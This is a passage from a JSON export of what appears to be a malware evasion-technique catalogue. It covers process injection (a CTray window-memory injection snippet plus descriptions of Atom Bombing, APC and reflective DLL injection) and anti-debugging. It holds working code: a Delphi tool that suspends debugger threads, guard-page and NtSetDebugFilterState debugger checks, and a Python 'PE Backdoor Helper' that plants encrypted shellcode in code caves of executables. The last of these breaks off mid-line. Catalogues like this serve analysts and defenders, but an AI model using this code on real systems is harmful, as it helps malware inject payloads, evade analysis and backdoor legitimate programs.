target process\r\n    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);\r\n    \r\n    // 9. Allocate RW memory for the new CTray object\r\n    ds = VirtualAllocEx(hp, NULL, sizeof(ct), \r\n      MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n    \r\n    // 10. Write the new CTray object to remote memory\r\n    ct.vTable  = (ULONG_PTR)ds + sizeof(ULONG_PTR);\r\n    ct.WndProc = (ULONG_PTR)cs;\r\n    \r\n    WriteProcessMemory(hp, ds, &ct, sizeof(ct), &wr); \r\n    // 11. Set the new pointer to CTray object\r\n    SetWindowLongPtr(hw, 0, (ULONG_PTR)ds);\r\n    \r\n    // 12. Trigger the payload via a windows message\r\n    PostMessage(hw, WM_CLOSE, 0, 0);\r\n    \r\n    // 13. Restore the original CTray object\r\n    SetWindowLongPtr(hw, 0, ctp);\r\n    // 14. Release memory and close handles\r\n    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);\r\n    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);\r\n    CloseHandle(hp);\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "name": "Atom Bombing",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "Atom Bombing is another form of process injection. As Process Doppelgänging, this technique abuses legitimate Windows functions, in this case Atom Tables. The Atom Tables provide a globally accessible string storage mechanism. Thus, an application can store data into an Atom Table, where other applications can access it. The Atom Bombing technique will store a shellcode into the Atom Tables. Then by forcing the targeted process (with NtQueueApcThread) to call this specific Atom, the injection will occur. Finally, a Return Oriented Programming chain is used to bypass Data Execution Prevention (DEP), to run the shellcode.",
            "resources": "https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows",
            "tags": "atom",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "APC injection",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "Malware can take advantage of Asynchronous Procedure Calls (APC) to force another thread to execute their custom code by attaching it to the APC Queue of the target thread. Each thread has a queue of APCs which are waiting for execution upon the target thread entering alterable state. A thread enters an alert table state if it calls SleepEx, SignalObjectAndWait, MsgWaitForMultipleObjectsEx, WaitForMultipleObjectsEx, or WaitForSingleObjectEx functions. The malware usually looks for any thread that is in an alterable state, and then calls OpenThread and QueueUserAPC to queue an APC to a thread.",
            "resources": "http://blogs.microsoft.co.il/pavely/2017/03/14/injecting-a-dll-without-a-remote-thread/",
            "tags": "apc",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Image File Execution Options Injection",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "Appinit_DLL, AppCertDlls, and IFEO (Image File Execution Options) are all registry keys that malware uses for both injection and persistence.",
            "resources": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
            "tags": "ifeo",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Thread Execution Hijacking",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "In thread execution hijacking, malware targets an existing thread of a process and avoids any noisy process or thread creations operations. Therefore, during analysis it is possible to see calls to CreateToolhelp32Snapshot and Thread32First followed by OpenThread.",
            "resources": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Reflective DLL injection",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "Reflective DLL loading refers to loading a DLL from memory rather than from disk. Windows doesn’t have a LoadLibrary function that supports this, so to get the functionality you have to write your own, omitting some of the things Windows normally does, such as registering the DLL as a loaded module in the process , potentially bypassing DLL load monitoring.",
            "resources": "https://0x00sec.org/t/reflective-dll-injection/3080",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "SuspendThread",
            "category": [
                "https://search.unprotect.it/api/categories/3/"
            ],
            "description": "The kernel32 SuspendThread function or the NTDLL NtSuspendThread function can be another very effective way to disable user-mode debuggers. This can be achieved by enumerating the threads of a given process, or searching for a named window and opening its owner thread, and then suspending that thread.",
            "resources": "https://anti-reversing.com/Downloads/Anti-Reversing/The_Ultimate_Anti-Reversing_Reference.pdf\r\nhttps://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread\r\nhttp://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtSuspendThread.html",
            "tags": "Suspendthread",
            "snippets": [
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/1/",
                    "author": "https://search.unprotect.it/api/snippet_authors/1/",
                    "technique": "https://search.unprotect.it/api/techniques/109/",
                    "description": "You can compile this unit as a classic Delphi Console Application. Feel free to edit both `LFindWindowSignatures` and `LProcessNameSignatures` to support more debuggers.",
                    "plain_code": "program SuspendThread;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  WinAPI.Windows, System.SysUtils, Generics.Collections, tlHelp32, Classes;\r\n\r\ntype\r\n  TProcessItem = class\r\n  private\r\n    FName      : String;\r\n    FProcessId : Cardinal;\r\n    FThreads   : TList<Cardinal>;\r\n\r\n    {@M}\r\n    procedure EnumThreads();\r\n  public\r\n    {@C}\r\n    constructor Create(AName : String; AProcessId : Cardinal; AEnumThreads : Boolean = True);\r\n    destructor Destroy(); override;\r\n\r\n    {@G}\r\n    property Name      : String          read FName;\r\n    property ProcessId : Cardinal        read FProcessId;\r\n    property Threads   : TList<Cardinal> read FThreads;\r\n  end;\r\n\r\n  TEnumProcess = class\r\n  private\r\n    FItems : TObjectList<TProcessItem>;\r\n  public\r\n    {@C}\r\n    constructor Create();\r\n    destructor Destroy(); override;\r\n\r\n    {@M}\r\n    function Refresh() : Cardinal;\r\n    procedure Clear();\r\n\r\n    function Get(AProcessId : Cardinal) : TProcessItem; overload;\r\n    function Get(AName : String) : TProcessItem; overload;\r\n\r\n    {@G}\r\n    property Items : TObjectList<TProcessItem> read FItems;\r\n  end;\r\n\r\n{\r\n  Import API's From Kernel32\r\n}\r\nconst THREAD_SUSPEND_RESUME = $00000002;\r\n\r\nfunction OpenThread(\r\n                      dwDesiredAccess: DWORD;\r\n                      bInheritHandle: BOOL;\r\n                      dwThreadId: DWORD\r\n          ) : THandle; stdcall; external kernel32 name 'OpenThread';\r\n\r\n{\r\n  Global Vars\r\n}\r\nvar LFindWindowSignatures  : TDictionary<String, String>;\r\n    LProcessNameSignatures : TStringList;\r\n    LProcesses             : TEnumProcess;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Process Item (Process Name / Process Id / Process Main Thread Id)\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TProcessItem.Create(AName : String; AProcessId : Cardinal; AEnumThreads : Boolean = True);\r\nbegin\r\n  FName      := AName;\r\n  FProcessId := AProcessId;\r\n\r\n  FThreads := TList<Cardinal>.Create();\r\n\r\n  if AEnumThreads then\r\n    self.EnumThreads();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___destructor\r\n-------------------------------------------------------------------------------}\r\ndestructor TProcessItem.Destroy();\r\nbegin\r\n  if Assigned(FThreads) then\r\n    FreeAndNil(FThreads);\r\n\r\n  ///\r\n  inherited Destroy();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Enumerate Threads of process object\r\n-------------------------------------------------------------------------------}\r\nprocedure TProcessItem.EnumThreads();\r\nvar ASnap        : THandle;\r\n    AThreadEntry : TThreadEntry32;\r\n\r\n    procedure InitializeItem();\r\n    begin\r\n      ZeroMemory(@AThreadEntry, SizeOf(TThreadEntry32));\r\n\r\n      AThreadEntry.dwSize := SizeOf(TThreadEntry32);\r\n    end;\r\n\r\n    procedure AppendItem();\r\n    begin\r\n      if (AThreadEntry.th32OwnerProcessID <> FProcessId) then\r\n        Exit();\r\n      ///\r\n\r\n      FThreads.Add(AThreadEntry.th32ThreadID);\r\n    end;\r\nbegin\r\n  if NOT Assigned(FThreads) then\r\n    Exit();\r\n  ///\r\n\r\n  FThreads.Clear();\r\n  ///\r\n\r\n  ASnap := CreateToolHelp32Snapshot(TH32CS_SNAPTHREAD, 0);\r\n  if (ASnap = INVALID_HANDLE_VALUE) then\r\n    Exit();\r\n  try\r\n    InitializeItem();\r\n\r\n    if NOT Thread32First(ASnap, AThreadEntry) then\r\n      Exit();\r\n\r\n    AppendItem();\r\n\r\n    while True do begin\r\n      InitializeItem();\r\n\r\n      if NOT Thread32Next(ASnap, AThreadEntry) then\r\n        break;\r\n\r\n      AppendItem();\r\n    end;\r\n  finally\r\n    CloseHandle(ASnap);\r\n  end;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Enumerate Process Class\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TEnumProcess.Create();\r\nbegin\r\n  FItems := TObjectList<TProcessItem>.Create();\r\n  FItems.OwnsObjects := True;\r\n\r\n  ///\r\n  self.Refresh();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___destructor\r\n-------------------------------------------------------------------------------}\r\ndestructor TEnumProcess.Destroy();\r\nbegin\r\n  if Assigned(FItems) then\r\n    FreeAndNil(FItems);\r\n\r\n  ///\r\n  inherited Destroy();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Enumerate Running Process.\r\n  @Return: Process Count\r\n-------------------------------------------------------------------------------}\r\nfunction TEnumProcess.Refresh() : Cardinal;\r\nvar ASnap         : THandle;\r\n    AProcessEntry : TProcessEntry32;\r\n\r\n    procedure InitializeItem();\r\n    begin\r\n      ZeroMemory(@AProcessEntry, SizeOf(TProcessEntry32));\r\n\r\n      AProcessEntry.dwSize := SizeOf(TProcessEntry32);\r\n    end;\r\n\r\n    procedure AppendItem();\r\n    var AItem : TProcessItem;\r\n    begin\r\n      AItem := TProcessItem.Create(\r\n                                    AProcessEntry.szExeFile,\r\n                                    AProcessEntry.th32ProcessID,\r\n                                    True {Enum Threads: Default}\r\n      );\r\n\r\n      FItems.Add(AItem);\r\n    end;\r\n\r\nbegin\r\n  result := 0;\r\n  ///\r\n\r\n  if NOT Assigned(FItems) then\r\n    Exit();\r\n  ///\r\n\r\n  self.Clear();\r\n\r\n  ASnap := CreateToolHelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n  if (ASnap = INVALID_HANDLE_VALUE) then\r\n    Exit();\r\n  try\r\n    InitializeItem();\r\n\r\n    if NOT Process32First(ASnap, AProcessEntry) then\r\n      Exit();\r\n\r\n    AppendItem();\r\n\r\n    while True do begin\r\n      InitializeItem();\r\n\r\n      if NOT Process32Next(ASnap, AProcessEntry) then\r\n        break;\r\n\r\n      AppendItem();\r\n    end;\r\n  finally\r\n    CloseHandle(ASnap);\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Clear Items (Process Objects)\r\n-------------------------------------------------------------------------------}\r\nprocedure TEnumProcess.Clear();\r\nbegin\r\n  if Assigned(FItems) then\r\n    FItems.Clear;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Get Process Item by Process Id or Name\r\n-------------------------------------------------------------------------------}\r\nfunction TEnumProcess.Get(AProcessId : Cardinal) : TProcessItem;\r\nvar AItem : TProcessItem;\r\n    I     : Integer;\r\nbegin\r\n  result := nil;\r\n  ///\r\n\r\n  for I := 0 to self.Items.count -1 do begin\r\n    AItem := self.Items.Items[I];\r\n    if NOT Assigned(AItem) then\r\n      continue;\r\n    ///\r\n\r\n    if (AItem.ProcessId = AProcessId) then begin\r\n      result := AItem;\r\n\r\n      Break;\r\n    end;\r\n  end;\r\nend;\r\n\r\nfunction TEnumProcess.Get(AName : String) : TProcessItem;\r\nvar AItem : TProcessItem;\r\n    I     : Integer;\r\nbegin\r\n  result := nil;\r\n  ///\r\n\r\n  for I := 0 to self.Items.count -1 do begin\r\n    AItem := self.Items.Items[I];\r\n    if NOT Assigned(AItem) then\r\n      continue;\r\n    ///\r\n\r\n    if (AItem.Name.ToLower = AName.ToLower) then begin\r\n      result := AItem;\r\n\r\n      Break;\r\n    end;\r\n  end;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Main\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  Suspend Threads of target process.\r\n-------------------------------------------------------------------------------}\r\nfunction SuspendThreadsByProcessId(AProcessId : Cardinal) : Boolean;\r\nvar AItem     : TProcessItem;\r\n    AThreadId : Cardinal;\r\n    I         : Integer;\r\n    AThread   : THandle;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  if NOT Assigned(LProcesses) then\r\n    Exit();\r\n\r\n  AItem := LProcesses.Get(AProcessId);\r\n  if NOT Assigned(AItem) then\r\n    Exit();\r\n  ///\r\n\r\n  if (AItem.Threads.count = 0) then\r\n    Exit();\r\n  ///\r\n\r\n  for I := 0 to AItem.Threads.Count -1 do begin\r\n    AThreadId := AItem.Threads.Items[I];\r\n    ///\r\n\r\n    AThread := OpenThread(THREAD_SUSPEND_RESUME, False, AThreadId);\r\n    if (AThread = 0) then\r\n      continue;\r\n    try\r\n      WriteLn(Format('Suspending: %s(%d), Thread Id: %d...', [\r\n                                                                    AItem.Name,\r\n                                                                    AItem.ProcessId,\r\n                                                                    AThreadId\r\n      ]));\r\n\r\n      WinAPI.Windows.SuspendThread(AThread);\r\n\r\n      result := True;\r\n    finally\r\n      CloseHandle(AThread);\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  FindWindow API Example\r\n-------------------------------------------------------------------------------}\r\nfunction method_FindWindow() : Boolean;\r\nvar AHandle     : THandle;\r\n    AProcessId  : Cardinal;\r\n    AClassName  : String;\r\n    AWindowName : String;\r\n    pClassName  : Pointer;\r\n    pWindowName : Pointer;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  for AClassName in LFindWindowSignatures.Keys do begin\r\n    if NOT LFindWindowSignatures.TryGetValue(AClassName, AWindowName) then\r\n      continue;\r\n    ///\r\n\r\n    pClassName  := nil;\r\n    pWindowName := nil;\r\n\r\n    if NOT AClassName.isEmpty then\r\n      pClassName := PWideChar(AClassName);\r\n\r\n    if NOT AWindowName.isEmpty then\r\n      pWindowName := PWideChar(AWindowName);\r\n\r\n    AHandle := FindWindowW(pClassName, pWindowName);\r\n    if (AHandle > 0) then begin\r\n      GetWindowThreadProcessId(AHandle, @AProcessId);\r\n      if (AProcessId > 0) then\r\n        SuspendThreadsByProcessId(AProcessId);\r\n\r\n      ///\r\n      result := True;\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Find Process Example (Uses the TEnumProcess Class) - See above\r\n-------------------------------------------------------------------------------}\r\nfunction method_FindProcess() : Boolean;\r\nvar AItem : TProcessItem;\r\n    AName : String;\r\n    I     : Integer;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  for I := 0 to LProcessNameSignatures.count -1 do begin\r\n    AName := LProcessNameSignatures.Strings[I];\r\n\r\n    AItem := LProcesses.Get(AName);\r\n    if (NOT Assigned(AItem)) then\r\n      continue;\r\n    ///\r\n\r\n    SuspendThreadsByProcessId(AItem.ProcessId);\r\n\r\n    ///\r\n    result := True;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___entry\r\n-------------------------------------------------------------------------------}\r\nbegin\r\n  try\r\n    LProcesses := TEnumProcess.Create();\r\n    try\r\n      // FindWindow API\r\n      LFindWindowSignatures := TDictionary<String, String>.Create();\r\n      try\r\n        {\r\n          ...\r\n\r\n          @Param1: ClassName  (Empty = NULL)\r\n          @Param2: WindowName (Empty = NULL)\r\n\r\n          Add your own signatures bellow...\r\n        }\r\n        LFindWindowSignatures.Add('OLLYDBG', '');\r\n        {\r\n          ...\r\n        }\r\n        method_FindWindow();\r\n      finally\r\n        if Assigned(LFindWindowSignatures) then\r\n          FreeAndNil(LFindWindowSignatures);\r\n      end;\r\n\r\n      // Find by Process Name\r\n      LProcessNameSignatures := TStringList.Create();\r\n      try\r\n        {\r\n          ...\r\n\r\n          @Param1: Process Name (Example: OllyDbg.exe) - Case Insensitive\r\n\r\n          Add your own signatures bellow...\r\n        }\r\n        LProcessNameSignatures.Add('ImmunityDebugger.exe');\r\n        {\r\n          ...\r\n        }\r\n        method_FindProcess();\r\n      finally\r\n        if Assigned(LProcessNameSignatures) then\r\n          FreeAndNil(LProcessNameSignatures);\r\n      end;\r\n    finally\r\n      if Assigned(LProcesses) then\r\n        FreeAndNil(LProcesses);\r\n    end;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
                }
            ],
            "detection_rules": []
        },
        {
            "name": "Guard Pages",
            "category": [
                "https://search.unprotect.it/api/categories/3/"
            ],
            "description": "Detection of guard pages is somewhat rare and based on imitation of debugger behavior - i.e. creation of PAGE_GUARD memory page and accessing it, previously put return address onto the stack. If STATUS_GUARD_PAGE_VIOLATION occurs, it’s assumed no debugging is in place.",
            "resources": "http://antukh.com/blog/2015/01/19/malware-techniques-cheat-sheet/",
            "tags": "",
            "snippets": [
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/2/",
                    "author": "https://search.unprotect.it/api/snippet_authors/3/",
                    "technique": "https://search.unprotect.it/api/techniques/108/",
                    "description": "Source: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/MemoryBreakpoints_PageGuard.cpp",
                    "plain_code": "#include \"pch.h\"\r\n\r\n#include \"MemoryBreakpoints_PageGuard.h\"\r\n\r\n/*\r\nIn essence, what occurs is that we allocate a dynamic buffer and write a RET to the buffer.\r\nWe then mark the page as a guard page and push a potential return address onto the stack. Next, we jump to our page,\r\nand if we're under a debugger, specifically OllyDBG, then we will hit the RET instruction and return to the address we pushed onto\r\nthe stack before we jumped to our page. Otherwise, a STATUS_GUARD_PAGE_VIOLATION exception will occur, and we know we're not being\r\ndebugged by OllyDBG.\r\n*/\r\n\r\nBOOL MemoryBreakpoints_PageGuard()\r\n{\r\n\tUCHAR *pMem = NULL;\r\n\tSYSTEM_INFO SystemInfo = { 0 };\r\n\tDWORD OldProtect = 0;\r\n\tPVOID pAllocation = NULL; // Get the page size for the system \r\n\r\n\t// Retrieves information about the current system.\r\n\tGetSystemInfo(&SystemInfo);\r\n\r\n\t// Allocate memory \r\n\tpAllocation = VirtualAlloc(NULL, SystemInfo.dwPageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n\tif (pAllocation == NULL)\r\n\t\treturn FALSE;\r\n\r\n\t// Write a ret to the buffer (opcode 0xc3)\r\n\tRtlFillMemory(pAllocation, 1, 0xC3);\r\n\r\n\t// Make the page a guard page         \r\n\tif (VirtualProtect(pAllocation, SystemInfo.dwPageSize, PAGE_EXECUTE_READWRITE | PAGE_GUARD, &OldProtect) == 0)\r\n\t\treturn FALSE;\r\n\r\n\t__try\r\n\t{\r\n\t\t((void(*)())pAllocation)(); // Exception or execution, which shall it be :D?\r\n\t}\r\n\t__except (GetExceptionCode() == STATUS_GUARD_PAGE_VIOLATION ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)\r\n\t{\r\n\t\tVirtualFree(pAllocation, 0, MEM_RELEASE);\r\n\t\treturn FALSE;\r\n\t}\r\n\r\n\tVirtualFree(pAllocation, 0, MEM_RELEASE);\r\n\treturn TRUE;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "name": "NtSetDebugFilterState",
            "category": [
                "https://search.unprotect.it/api/categories/3/"
            ],
            "description": "The NtSetDebugFilterState function can be used to detect the presence of a debugger.",
            "resources": "https://www.evilfingers.com/publications/research_EN/NtSetDebugFilterState.pdf",
            "tags": "",
            "snippets": [
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/1/",
                    "author": "https://search.unprotect.it/api/snippet_authors/1/",
                    "technique": "https://search.unprotect.it/api/techniques/107/",
                    "description": "",
                    "plain_code": "program NtSetDebugFilterState;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  WinAPI.Windows, System.SysUtils;\r\n\r\nvar\r\n  NtSetDebugFilterState : function(AComponentId : ULONG; ALevel : ULONG; AState : Boolean) : NTSTATUS; stdcall;\r\n\r\n  hNTDLL  : THandle;\r\n  AStatus : NTSTATUS;\r\n\r\nbegin\r\n  try\r\n    hNTDLL := LoadLibrary('ntdll.dll');\r\n    if (hNTDLL = 0) then\r\n      Exit();\r\n    try\r\n      @NtSetDebugFilterState := GetProcAddress(hNTDLL, 'NtSetDebugFilterState');\r\n\r\n      if NOT Assigned(NtSetDebugFilterState) then\r\n        Exit();\r\n\r\n      AStatus := NtSetDebugFilterState(0, 0, True);\r\n\r\n      writeln(AStatus);\r\n\r\n      if (AStatus <> 0) then\r\n        WriteLn('Not Debugged.')\r\n      else\r\n        WriteLn('Debugged.');\r\n    finally\r\n      FreeLibrary(hNTDLL);\r\n    end;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
                }
            ],
            "detection_rules": []
        },
        {
            "name": "Code Cave",
            "category": [
                "https://search.unprotect.it/api/categories/2/"
            ],
            "description": "A code cave is a series of null bytes in a process's memory. The code cave inside a process's memory is often a reference to a section of the code’s script functions that have capacity for the injection of custom instructions. For example, if a script’s memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes can be used to add external code to the script.",
            "resources": "https://resources.infosecinstitute.com/injecting-spyware-exe-code-injections/",
            "tags": "",
            "snippets": [
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/3/",
                    "author": "https://search.unprotect.it/api/snippet_authors/1/",
                    "technique": "https://search.unprotect.it/api/techniques/106/",
                    "description": "* `-f / --file` : Valid PE File location (Ex: /path/to/calc.exe).\r\n* `-p / --payload` : Shellcode Payload (Example: \\\"\\\\x01\\\\x02\\\\x03...\\\\x0a\\\").\r\n* `-x / --encrypt` : Encrypt main section (entry point section).\r\n* `-k / --encryption-key` : Define custom encryption key (1 Byte only).\r\n* `-c / --cave-opcodes` : Define code opcode list to search for.\r\n* `-s / --cave-min-size` : Minimum size of region to be considered as code cave.\r\n* `-e / --egg` : Define a custom egg name (ESP Restore Mechanism).",
                    "plain_code": "import pefile\r\nimport struct\r\nimport argparse\r\nimport sys\r\nimport os\r\n\r\nclass tcolors:\r\n\tclear = \"\\033[0m\"\r\n\tgreen = \"\\033[32m\"\r\n\tred = \"\\033[31m\"\r\n\tyellow = \"\\033[33m\"\r\n\tblue = \"\\033[34m\"\r\n\tgray = \"\\033[90m\"\r\n\r\n\r\ndef success(message):\r\n\tprint(f\"[\\033[32m✓\\033[39m] {message}\")\r\n\r\n\r\ndef error(message):\r\n\tprint(f\"\\033[31m{message}\\033[39m\")\r\n\r\n\r\ndef debug(message):\r\n\tprint(f\"[\\033[34m*\\033[39m] {message}\")\t\r\n\r\ndef warning(message):\r\n\tprint(f\"[\\033[33m!\\033[39m] {message}\")\r\n\r\n\r\ndef title(title):\r\n\tprint(\"\\n\" + (\"=\" * 45))\r\n\tprint(f\" {title}\")\r\n\tprint(\"=\" * 45)\r\n\r\n\r\ndef bytearr_to_bytestr(data):\r\n\treturn ''.join(f\"\\\\x{'{:02x}'.format(x)}\" for x in data)\r\n\r\n\r\ndef bytestr_to_bytearr(data):\r\n\treturn list(bytearray.fromhex(data.replace(\"\\\\x\", \" \")))\r\n\r\n\r\nclass CodeCave:\r\n\t\"\"\"\r\n\t\tClass containing information about a found code cave\r\n\t\"\"\"\r\n\r\n\tdef __init__(self, name, section, offset, size, cave_type):\r\n\t\tself.name = name\r\n\t\tself.section = section\r\n\t\tself.offset = offset\t\r\n\t\tself.size = size\t\r\n\t\tself.type = cave_type\r\n\r\n\r\ndef get_section_by_address(address):\r\n\tfor section in pe.sections:\r\n\r\n\t\tsection_begin_address = (image_base + section.VirtualAddress)\r\n\t\tsection_end_address = (section_begin_address + section.SizeOfRawData)\r\n\r\n\t\tif (address >= section_begin_address) and (address <= section_end_address):\r\n\t\t\treturn section\r\n\r\n\treturn None\r\n\r\n\r\ndef get_section_name(section):\r\n\t\"\"\"\r\n\t\tReturn the name of a PE Section and strip for extra zeroes\r\n\r\n\t\tA section name is always equal to zero bytes and padded with zeros.\r\n\t\"\"\"\r\n\r\n\tif not section:\r\n\t\treturn \"\"\r\n\r\n\treturn section.Name.decode(\"utf-8\").strip('\\0').lower()\r\n\r\n\r\ndef define_section_rwe(section):\r\n\t\"\"\"\r\n\t\tUpdate section flag to Execute | Read | Write -> 0xE0000020\r\n\t\"\"\"\r\n\tflags = 0xe0000020\r\n\r\n\tif section.Characteristics != flags:\r\n\t\tdebug(f\"Section flags updated from {hex(section.Characteristics)} to {hex(flags)} (READ / WRITE / EXECUTE)\")\r\n\r\n\t\tsection.Characteristics = flags\r\n\r\n\r\ndef code_cave_finder(section, cave_opcode):\r\n\t\"\"\"\r\n\t\tFind a succession of x NOP's or a succession of x NULL Bytes in a section.\r\n\r\n\t\tTo be consired as a code cave, buffer space must be at least equal or above 50 Bytes.\r\n\r\n\t\tSection must be executable in order to host our payload.\t\r\n\t\"\"\"\r\n\r\n\tname = get_section_name(section)\r\n\r\n\tif len(search_in_sections) > 0:\r\n\t\tif not name in search_in_sections:\r\n\t\t\treturn False\r\n\r\n\toffset = section.VirtualAddress\r\n\r\n\tsection_data = pe.get_memory_mapped_image()[offset:offset + section.SizeOfRawData]\t\t\r\n\r\n\tcave_length = 0\t\r\n\r\n\tfor index, b in enumerate(section_data, start=1):\t\t\t\r\n\t\tif (b == cave_opcode):\t\t\t\t\r\n\t\t\tcave_length += 1\t\r\n\r\n\t\tif ((b != cave_opcode) and (cave_length > 0)) or (index == len(section_data)):\r\n\t\t\t\r\n\t\t\tif cave_length >= argv.cave_min_size:\t\t\t\t\t\r\n\t\t\t\tcave = CodeCave(name, section, (index - cave_length), cave_length, cave_opcode)\r\n\r\n\t\t\t\tcode_caves.append(cave)\r\n\t\t\t\r\n\t\t\tcave_length = 0\r\n\r\n\treturn True\r\n\r\n\r\ndef encrypt_section(section, xor_key):\r\n\t\"\"\"\r\n\t\tEncrypt whole PE Section using a basic XOR Encoder (4 Bytes Key)\r\n\t\"\"\"\r\n\r\n\toffset = section.VirtualAddress\r\n\r\n\tsection_data = bytearray(pe.get_memory_mapped_image()[offset:offset + section.SizeOfRawData])\r\n\r\n\tfor index, b in enumerate(section_data):\t\t\t\t\r\n\t\tsection_data[index] =  b ^ xor_key # b ^ (index % 256)\r\n\r\n\tpe.set_bytes_at_offset(section.PointerToRawData, bytes(section_data))\t\r\n\r\n\r\ndef get_rel_distance(origine, destination):\r\n\t\"\"\"\r\n\t\tRetrieve the relative distance between two locations.\r\n\r\n\t\tlocation is relative to image_base\r\n\t\"\"\"\r\n\torigine += image_base\r\n\tdestination += image_base\r\n\r\n\tdistance = 0x0\r\n\r\n\tif origine > destination:\r\n\t\tdistance = (0x0 - (origine - destination)) & 0xffffffff\r\n\telse:\t\t\r\n\t\tdistance = (destination - origine)\r\n\r\n\treturn distance\r\n\r\n\r\n\r\n'''\r\n-------------------------------------------------------------------------------------------------------\r\n\r\n\tEntry Point\r\n\t\r\n-------------------------------------------------------------------------------------------------------\r\n'''\r\nif __name__ == \"__main__\":\r\n\tsearch_in_sections = [] # [] = All Sections\r\n\ttry:\r\n\t\targument_parser = argparse.ArgumentParser(description=f\"PE Backdoor Helper by {tcolors.blue}@DarkCoderSc{tcolors.clear}\")\r\n\r\n\t\targument_parser.add_argument('-f', '--file', type=str, dest=\"file\", action=\"store\", required=True, help=\"Valid PE File location (Ex: /path/to/calc.exe).\")\r\n\r\n\t\targument_parser.add_argument('-p', '--payload', type=str, dest=\"payload\", action=\"store\", required=False, default=\"\", help=\"Shellcode Payload (Example: \\\"\\\\x01\\\\x02\\\\x03...\\\\x0a\\\").\")\r\n\r\n\t\targument_parser.add_argument('-x', '--encrypt', dest=\"encrypt_main_section\", action=\"store_true\", required=False, default=False, help=\"Encrypt main section (entry point section).\")\t\t\r\n\r\n\t\targument_parser.add_argument('-k', '--encryption-key', type=str, dest=\"encryption_key\", action=\"store\", required=False, default=\"\\\\x0c\", help=\"Define custom encryption key (1 Byte only).\")\t\t\r\n\r\n\t\targument_parser.add_argument('-c', '--cave-opcodes', type=str, dest=\"cave_opcodes\", action=\"store\", default=\"\\\\x00\\\\x90\", help=\"Define code opcode list to search for.\")\r\n\r\n\t\targument_parser.add_argument('-s', '--cave-min-size', type=int, dest=\"cave_min_size\", action=\"store\", default=50, help=\"Minimum size of region to be considered as code cave.\")\t\t\t\t\r\n\r\n\t\targument_parser.add_argument('-e', '--egg', type=str, dest=\"egg\", action=\"store\", required=False, default=\"egg!\", help=\"Define a custom egg name (ESP Restore Mechanism)\")\r\n\r\n\t\ttry:\r\n\t\t\targv = argument_parser.parse_args()\t\t\r\n\t\texcept IOError as e:\r\n\t\t\tparser.error()\r\n\r\n\r\n\t\tif not argv.encrypt_main_section and (len(argv.payload) == 0):\r\n\t\t\traise Exception(\"You must either define a payload or decide to encrypt main section of target file in order to find this tool useful.\")\r\n\r\n\r\n\t\ttry:\r\n\t\t\tshellcode = 